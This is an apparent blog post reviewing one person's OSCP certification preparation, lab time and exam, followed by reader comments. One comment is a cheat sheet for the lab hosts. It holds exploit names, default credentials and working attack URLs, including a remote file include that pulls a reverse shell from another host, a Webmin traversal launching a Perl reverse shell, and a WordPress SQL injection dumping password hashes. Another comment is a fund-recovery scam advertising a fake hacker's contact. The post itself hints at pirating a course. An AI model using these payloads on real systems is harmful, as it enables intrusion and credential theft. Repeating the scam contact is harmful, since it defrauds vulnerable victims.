MY OSCP REVIEW


MY OSCP REVIEW


About me

I am just a guy who has done B.E (Computer Engineering), C.E.H and I am doing vulnerability assessment for different clients in Mumbai.

Inspiration to do OSCP

Wanted to read technical stuff only then skip this para. Like other guyz I thought that OSCP is one of the most difficult task in the world of IT Security.
And yes, it is one the difficult mission you could ever face. Back in Dec 2014 I was really bored with the conventional vulnerability assessment thing, I wanted to do some more exploitation and some black hat stuff. But in our job we were not allowed to do so, as the environment used to be critical most of the time and time for completing the task was less.
So I asked few question on some group in facebook regarding How can I learn more exploitation stuff.
There was a guy with the name Mr.WhiteW0rm who have given me a brilliant answer and recommended me to do OSCP. That time I thought though I won't be able to do OSCP but at least I'll study in its way and work on exploitation as required in OSCP.

Study That I did before OSCP:

I knew that we can use metasploit in the Labs and in Exam. So I started with learning metasploit.
Thou I know a bit of it as thought in C.E.H classes, but I need to know more.
There is a friend of mine named Chetan who told me to do metasploit from security tube.

  • Learning Metasploit

1) I collected all the videos of Metasploit from securitytube. Trust me guyz no one could explain metasploit and post-exploitation with metasploit better that Vivek Ramachandran.
It can be found here http://www.securitytube.net/groups?operation=view&groupId=8
2) Udemy metasploit tutorial given by Mr. Hitesh Choudhary It can be found here https://www.udemy.com/draft/93016/
The above course material is available for Free ;) if u know what I mean.

  • Learning Python:

1) I used security tube python scripting videos for learning python. It can be found here http://www.securitytube-training.com/online-courses/securitytube-python-scripting-expert/index.html
I learnt only the first and 3rd module from it. Basically python basics and socket programming is required for bufferoverflow exploitation and OSCP.
2) The book that I referred to practice python program is Violent Python. I did first 4-5 programs from the book.


  • Learning buffer overflow:

It is the most interesting and challenging part in OSCP. This was the module that I had to work really hard for. I saw some videos on bufferoverflow. It was initially difficult to understand until I read the following site http://www.primalsecurity.net/0x0-exploit-tutorial-buffer-overflow-vanilla-eip-overwrite-2/
It explain buffer overflow in details.
Secondly I used Exploit research Megaprimer http://www.securitytube.net/groups?operation=view&groupId=7
Lastly I set up my own lab and practiced buffer overflow. I wrote 2 of such buffer overflow exploit on my blog:
http://justpentest.blogspot.in/2015/08/echoserver-strcpy-bufferoverflow.html
http://justpentest.blogspot.in/2015/07/minishare1.4.1-bufferoverflow.html

  • Learning port forwarding and pivoting:

I've documented it on my blog http://justpentest.blogspot.in/2015/07/port-forwarding-and-pivoting.html

  • Practicing on vulnhub.com vm's

This is one of the most important and interesting part. Before enrolling for OSCP labs I've done ten's  of Vulnerable Vm's from https://www.vulnhub.com/
I would recommend the following Vm's:
1)  Kioptrix series present here https://www.vulnhub.com/series/kioptrix,8/
2) Troll series present here https://www.vulnhub.com/series/tr0ll,49/
3) Pegasus present here https://www.vulnhub.com/entry/pegasus-1,109/
4) Command Injection OS by Security tube https://www.vulnhub.com/entry/command-injection-iso-1,81/   (Try to do this without metasploit, as I've done here http://justpentest.blogspot.in/2015/07/pentester-academy-command-injection-iso-basilic-exploit.html )
The practical exposure  I've got from vulnhub.com A big thanks to the guyz who made it.

  • Post exploitation and privilege escalation:

The ultimate resource on post exploitation and privilege escalation that I've found so far can be found here https://github.com/rmusser01/Infosec_Reference/blob/master/Draft/Draft/Privilege%20Escalation%20%26%20Post-Exploitation.md#winpost

Some privilege escalation tools that I've used for Linux:
1) Linux priv check www.securitysift.com/download/linuxprivchecker.py
2) LinEnum http://www.rebootuser.com/?p=1758#.VkG1BSvHU1I 
Linux exploit suggester can be found here https://github.com/PenturaLabs/Linux_Exploit_Suggester
I guess 90% of the privilege escalation loopholes can be enumerated from the above tool.
Privilege escalation is an art, trust me it troubled me a lot in OSCP labs. Privilege escalation is all about how well you know Linux.

Some privilege escalation tools that I've used for Windows:
1) Windows Exploit suggester  https://blog.gdssecurity.com/labs/2014/7/11/introducing-windows-exploit-suggester.html
 Some good information regarding Windows privilege escalation can be found in security tube metasploit megaprimer.

My OSCP Lab Review:


I've taken one month Lab time, but I would recommend 2 month lab time is sufficient enough. There are approximately 35+ machine in student network and there are 3 network key that can be found on some of the host in student network. These keys will help you to unlock other Lan segment. Well, I got 2 network key.  Lab time is the time that I will never forget in my Life. There were few days, I was really happy because I've compromised my target. But there were many days that I was really upset, disappointed. There was a day I was so frustrated that I thought of quitting it. As they say "TRY HARDER" I took a break tried harder and harder and finally I compromised my target.
 I can proudly say I was able to compromise root  of one of the toughest machine in the Lab named as "PAIN".
 All in all I could say Lab time is a journey it will teach you a lot. In labs you will find variety of Operating system (Linux,Solaris, Windows, Ubuntu, Debian etc), variety of application server (apache, IIS, tomcat, with their different version and flavors) various service and various vulnerability.
There are some pretty famous framework that are used in corporate network but they are vulnerable and can be compromised to get the system.
Admin's of Offsec helps some time, gives disappointing answers sometimes. I could say instead of asking your query to admin, you should concentrate on enumeration and use google. I would recommend "MINIMUM USAGE OF METASPLOIT IN LABS", as this will increase you skill and it is very helpful.


My OSCP Exam review:

There are 5 machine in exam that is supposed to be compromised. There are 3 machine usage of metasploit is allowed but , you can use metasploit on 1 of the 3 machine.




There are few lab machines that are difficult than all the machines in Exam.
The problem with the exam is that you have to compromise 5 machine. Out of which for one machine you have to code a buffer overflow exploit. For other machine you need to do lot of enumeration which is time consuming.

I cleared all 5 machine with its root access in 10 hours.

Finally I got the MAIL ;)















Comments

  1. congratulations are in order. I am sure, you have a transparent way out now ;)

    ReplyDelete
  2. Congratulations !!! Hope this will motivate me to try this ...thanks for your detailed explanation ...

    ReplyDelete
  3. Thanks for the write up. btw how to access the metasploit udemy course for free. Like to take the course.

    ReplyDelete
  4. Hi,

    i would like to know if you had to:-
    1 Code for SEH/ Egg Hunters in lab or in Exam? Also Do we need to learn linux buffer overflows ??
    2 Is it worth to bruteforce for weak credentials?

    Thanks

    ReplyDelete
  5. Amazing article , excellent work brother

    ReplyDelete
  6. Amazing article , excellent work brother

    ReplyDelete
  7. Hi Hashim,
    Congratulation for your Certification and I am planning to take this exam and I have very basic question is it good to have windows 7 with KaliLinux as VM or Kali Linux it self on laptop..I can have any of these but wanted to know which will help more

    ReplyDelete
    Replies
    1. Kali in VM is good enough thats what most people do...

      Delete
  8. Thanks Hashim for your work and blog posts. I have followed your posts and your guidance regarding OSCP. I am OSCP now. Thanks for your help

    ReplyDelete
  9. This comment has been removed by the author.

    ReplyDelete
  10. Congrats Hashim for OSCP and Thanks for sharing the useful links.

    ReplyDelete
  11. if you need any help email me a.sharabati@gmail.com
    by Ahmad Adel Moh. Sharabati
    address os_name os_sp purpose name
    192.168.13.201 Windows XP client SMB MS08-067
    192.168.13.202 Ubuntu Server RFI - priv:Linux Kernel <= 2.6.34-rc3 ReiserFS xattr Privilege Escalation
    192.168.13.203 Windows 2000 server WebDav
    192.168.13.204 Windows 2000 server WebDav
    192.168.13.205 Windows 2000 server pass the hash from 206
    192.168.13.206 Windows 2000 server SMB MS08-067
    192.168.13.207 Windows XP client
    192.168.13.208 Linux 2.4.X server RFI - priv:Linux Kernel <= 2.6.34-rc3 ReiserFS xattr Privilege Escalation
    192.168.13.209 OpenSolaris device tomcat - default account
    192.168.13.210 Windows 2003 server coldfusion 8
    192.168.13.214 Linux 3.X server
    192.168.13.215 Linux redhat samba 2.2.7a
    192.168.13.216 FreeBSD 7.X device csm php lite admin
    192.168.13.218 Windows 2008 server
    192.168.13.219 Linux 3.X server
    192.168.13.220 Windows 7 client
    192.168.13.221 Windows 2008 server
    192.168.13.222 ExtremeXOS 12.X device Samba 2.2.3a
    192.168.13.223 Windows 2008 server
    192.168.13.224 embedded device LFI NIKTO - brute force : bob user bob password
    192.168.13.225 Windows 2000 server telnet 192.168.13.225:123 --> MiniShare /windows/remote/616.c
    192.168.13.226 Windows 2003 server using metasploit be fast kill python.exe and migrate the process
    192.168.13.227 Windows 2000 server SMB MS08-067
    192.168.13.229 Windows 2003 server SMB MS08-067
    192.168.13.230 NetWare 6.X device
    192.168.13.231 Windows 2003 server SMB MS08-067
    192.168.13.234 Linux 2.6.X server https://www.exploit-db.com/exploits/15704/
    192.168.13.235 Linux 2.6.X server http://192.168.13.235/section.php?page=http://192.168.12.137/reverse_php.txt
    192.168.13.236 embedded device
    192.168.13.237 Linux 2.6.X server https://www.exploit-db.com/exploits/18650/
    192.168.13.238 Linux 3.X server
    192.168.13.239 Windows 2008 server ms09_050_smb2_negotiate_func_index
    192.168.13.241 Linux 2.6.X server http://192.168.13.241:10000/unauthenticated/..%01/..%01/%01/..%01/..%01/..%01/..%01/..%01//tmp/perl-reverse-shell.cgi
    192.168.13.242 Linux 2.6.X server alice user alice
    192.168.13.244 Linux 2.6.X server
    192.168.13.245 Windows 2008 server ms09_050_smb2_negotiate_func_index
    192.168.13.247 Windows 2000 server
    192.168.13.249 Android 2.X device FTP Pro
    192.168.13.250 Windows Vista client http://192.168.13.250:9505/?search={.exec|C:\Users\Public\Downloads\crypt.exe.}
    192.168.13.251 Linux 2.6.X server http://192.168.13.251/wp/wp-content/plugins/wp-forum/feed.php?topic=-4381+union+select+group_concat%28user_login,0x3a,user_pass%29+from+wp_users%23
    192.168.13.252 Linux 2.6.X server Time Sheet https://www.exploit-db.com/exploits/1518/

    ReplyDelete
  12. Have you been scammed of your money by fake brokers promising you returns on your investment and end up not fulfilling their many promises? Well I was a victim of such an ugly situation, I invested $150,000 in a particular crypto broker that promised me 50% of my investment weekly, it was such a tempting offer and like anyone else I invested in it, and after a week from the day I invested I contacted the broker for my profits and I received no reply, at first I kept my cool but after so many attempts to contact them I lost it, I was so devastated and broken...For weeks I wasn't myself and it had begun to tell on me until I read an online article on how someone like me was able to recover his funds from scammers. I read it carefully and closely and saw the email of the hacker that helped him recover his money from hackers. I contact the hacker and explained everything to him, we discussed everything I wasn't going to make a payment because I wasn't sure of the hacker but he proved his authenticity and helped me recover my money...I was so happy, I never felt happiness like that in my life before...all thanks to Jody Hacklord for a job well done, if you find yourself in a situation like mine contact him at h a c k l o r d j o d y @ g m a i l. c o m or WhatsApp + 1 ( 9 0 8 ) 9 9 1 ‑ 6 6 4 9

    ReplyDelete

Post a Comment

Popular posts from this blog

Minishare 1.4.1 Bufferoverflow